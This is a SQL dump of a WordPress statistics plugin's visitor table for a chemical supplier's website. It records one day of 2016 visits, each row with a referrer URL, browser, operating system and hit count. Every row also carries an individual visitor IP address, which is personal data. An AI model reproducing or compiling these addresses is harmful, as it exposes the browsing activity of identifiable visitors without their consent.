INSERT INTO `wp_statistics_visitor` VALUES (2374, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.42.84.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2375, '2016-10-10', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2376, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '110.34.225.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2377, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2378, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2379, '2016-10-10', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '189.252.136.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2380, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '189.252.136.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2381, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '189.252.136.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2382, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '147.108.253.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2383, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '78.214.170.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2384, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '204.169.30.2', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2385, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '98.187.248.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2386, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2387, '2016-10-10', 'https://www.bing.com/search?q=miller+stephenson+chemical+co&src=IE-SearchBox&FORM=IENTSR', 'MSIE', 'Windows', '11.0', '', '212.250.134.210', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2388, '2016-10-10', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '49.0.2623.112', '', '207.91.154.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2389, '2016-10-10', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '109.158.142.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2390, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '37.187.132.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2391, '2016-10-10', 'https://www.google.ca/', 'Chrome', 'Android', '53.0.2785.124', '', '173.183.253.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2392, '2016-10-10', 'https://www.seeingmeerkat.com/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2393, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '96.11.255.146', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2394, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.94.94.130', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2395, '2016-10-10', 'https://www.miller-stephenson.com/miller/solvents_cleaners.html', 'AppleWebKit', 'Windows', '534', '', '131.253.27.184', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2396, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '70.195.11.94', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2397, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.206.12.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2398, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '207.47.187.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2399, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.237.173.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2400, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.211.141.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2401, '2016-10-10', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '95.242.210.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2402, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '223.72.103.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2403, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2404, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjK_9qs2NDPAhVFVD4KHff4CsQQFggyMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '73.198.92.8', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2405, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '152.13.83.39', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2406, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '95.143.35.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2407, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '31.0.1650.16', '', '212.69.169.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2408, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.79', '', '11.11.0.152', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2409, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '40.134.83.18', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2410, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.41', '', '128.111.23.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2411, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '92.96.84.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2412, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '78.108.138.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2413, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2049.0', '', '91.121.83.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2414, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjg3dbj29DPAhUB7oMKHcBFAoIQFggsMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '172.20.1.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2415, '2016-10-10', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '79.116.26.222', '000', 55, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2416, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '68.52.64.65', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2417, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiwgfjT3dDPAhWi7YMKHT_yDggQFggsMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fheloxy-48%2F&usg=AFQjCNGLowSeVSzpRalTDpp2f0YDc4aIgA', 'MSIE', 'Windows', '11.0', '', '107.1.122.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2418, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '141.211.99.140', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2419, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '38.0.1025.166', '', '41.188.20.139', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2420, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.79.164.52', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2421, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '173.169.85.177', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2422, '2016-10-10', 'https://www.google.com.br/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=3&ved=0ahUKEwiNld-h4tDPAhVMND4KHbu6DEIQFggsMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-472c%2F&usg=AFQjCNHAgQ1vRxNnRmFNQQq89MyGhoEHuA&bvm=bv.135258522,d.cWw', 'MSIE', 'Windows', '10.0', '', '200.174.129.132', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2423, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.78.50.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2424, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi3qpWu4tDPAhUk7IMKHUmOCyQQFggnMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=DUEbFwyYheRvJ-TlAalMqw', 'MSIE', 'Windows', '11.0', '', '71.91.239.226', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2425, '2016-10-10', 'https://www.miller-stephenson.com/ptfe-dry-film-lubricants/', 'MSIE', 'Windows', '9.0', '', '182.118.25.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2426, '2016-10-10', 'https://www.miller-stephenson.com/ptfe-dry-film-lubricants/', 'MSIE', 'Windows', '9.0', '', '182.118.25.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2427, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '67.221.113.169', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2428, '2016-10-10', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '24.231.187.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2429, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '24.231.187.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2430, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.231.187.130', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2431, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2432, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2433, '2016-10-10', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.247.230.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2434, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.145.222.136', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2435, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '122.177.170.70', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2436, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2437, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '38.81.65.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2438, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.75.143.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2439, '2016-10-10', 'https://www.google.com.pk/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.175.79.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2440, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.95', '', '146.148.10.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2441, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '46.135.52.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2442, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.9.125.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2443, '2016-10-10', 'https://vykup-avto-krasnodar.ru/', 'MSIE', 'Windows', '5.5', '', '37.115.187.108', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2444, '2016-10-10', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2445, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '12.207.238.130', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2446, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjkvJmG69DPAhVE6iYKHXhSDTYQFggwMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '204.128.192.34', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2447, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.106.10.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2448, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj8kqe569DPAhXLOiYKHZV3AfcQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.eWE', 'MSIE', 'Windows', '11.0', '', '205.174.22.20', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2449, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.13.10.72', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2450, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.87', '', '96.83.147.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2451, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '72.240.134.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2452, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '24.142.180.92', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2453, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.28.80.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2454, '2016-10-10', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2455, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '74.71.147.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2456, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2457, '2016-10-10', 'https://www.bing.com/search?q=miller-stephenson+chemical&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '12.197.156.189', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2458, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj935i38NDPAhVM1GMKHa7kDdoQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-538%2C%2520539.pdf&usg=AFQjCNGknGAOTNhhBqF-HmqSnyxi2UgNKg&bvm=bv.135258522,d.cGc', 'MSIE', 'Windows', '11.0', '', '192.65.41.109', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2459, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2460, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2461, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.199.128.215', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2462, '2016-10-10', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.86.52.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2463, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.171.90.10', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2464, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '74.109.208.206', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2465, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi0rfKu9dDPAhVLRSYKHclsCOwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=PK2hS-l3N4GWp2--TuaIJA&bvm=bv.135258522,d.eWE', 'MSIE', 'Windows', '11.0', '', '97.67.95.162', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2466, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwi2o_S59dDPAhUj6oMKHTBmCasQFgg-MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '24.155.88.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2467, '2016-10-10', 'https://www.google.com/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiamuTf9dDPAhUBpY8KHVyODEUQFggVMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '9.0', '', '10.130.211.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2468, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2469, '2016-10-10', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjJgYX299DPAhUXO4EKHRsEBQsYABAE&sig=AOD64_2n4EwplLWdB_JiW3jtr4yDj5Uiyw&rct=j&q=&ved=0ahUKEwjk6YH299DPAhXCRiYKHcUmDJ8Q0QwIJQ&adurl=', 'MSIE', 'Windows', '11.0', '', '70.139.44.229', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2470, '2016-10-10', 'https://avtolombard-krasnodar.ru/', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2471, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2472, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2473, '2016-10-10', 'https://www.thomasnet.com/profile/30307412/millerstephenson-chemical-company.html?what=miller+stephenson+chemical&cov=CT', 'MSIE', 'Windows', '10.0', '', '184.18.146.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2474, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '74.94.123.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2475, '2016-10-10', 'https://r.search.yahoo.com/_ylt=AwrBT_z56ftXnhMALGxXNyoA;_ylu=X3oDMTEyMDNncGFtBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1476156026/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=zSiCxea5HQx413CVUtGNx5G8PGo-', 'Firefox', 'Windows', '49.0', '', '24.144.160.37', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2476, '2016-10-10', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi159TZ-tDPAhVOWoYKHdOHBgMYABAA&sig=AOD64_38Ljl6ZMUoumhQCAEu-K6xyTjmkg&rct=j&q=&ved=0ahUKEwj1stDZ-tDPAhUG4D4KHXx8B5MQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '12.34.32.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2477, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '32.210.68.95', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2478, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '124.176.54.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2479, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.138.64.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2480, '2016-10-10', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2481, '2016-10-10', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '195.154.233.180', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2482, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.109.50.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2483, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '35.0.1916.153', '', '31.3.233.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2484, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '130.101.154.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2485, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '50.197.126.200', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2486, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjC-fqwgtHPAhULXD4KHYamBvQQFggrMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2Fptfe-release-agent%2F&usg=AFQjCNHYtMUrNBM6Ow6nwVi19Ikhm0Wq9A&bvm=bv.135258522,d.cWw', 'MSIE', 'Windows', '11.0', '', '65.158.63.83', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2487, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '88.249.32.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2488, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '186.223.89.142', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2489, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '202.100.249.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2490, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '158.106.67.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2491, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '98.102.8.162', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2492, '2016-10-10', 'https://kiev.mistr-x.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2493, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.243.243.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2494, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.249.12.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2495, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2496, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '174.45.86.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2497, '2016-10-10', 'https://www.bing.com/search?q=MS-465C%20MSDS&qs=n&form=QBRE&pq=ms-465c%20msd&sc=0-11&sp=-1&sk=&cvid=4BE9FE210DE3419298861FFDC9681589', 'MSIE', 'Windows', '11.0', '', '162.18.172.11', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2498, '2016-10-10', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1205.QUsUrfjW3Hj6g5hgGo0sFfB__K7JIGoM8rLUxv6OY0b4Xj5QBeHAIKaRg_5gCQaE.b4daf2f6ac994626fd10c0716ab85f485a360698&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVHNNYkNmMjlzUGZteHZvZGpEcDU1amRGZmxFRXZ1X0ZXZnBiTzZWRUJvWjQ0Y0VOZU5malBpQQ&b64e=2&sign=ceec3bfefa84b60e100aba45e715fa9b&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrHxV2VrJgSM2dPTQElZYESsVg8cUe1uu21sbnrtTDUMlotqJGFf9Yb2PIuW-52dLNUiUm9O95-GBFelNcbDde-ZBrIqlNzv9jWGTVg6So8ScwAE3ksH1EqHoqIU3pHemq&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK00klnI_SPxtAUQKMVyM_Wi2x3MvD2hQUR_w0M-WGzLuD7Go_Gh-M2VPneDnFOdrApVpvhbIWMPs7kqZophYmgUw&l10n=ru&cts=1476130027139&mc=4.47717347512', 'Chrome', 'Windows', '28.0.1500.95', '', '128.75.15.185', '000', 2, 0); 
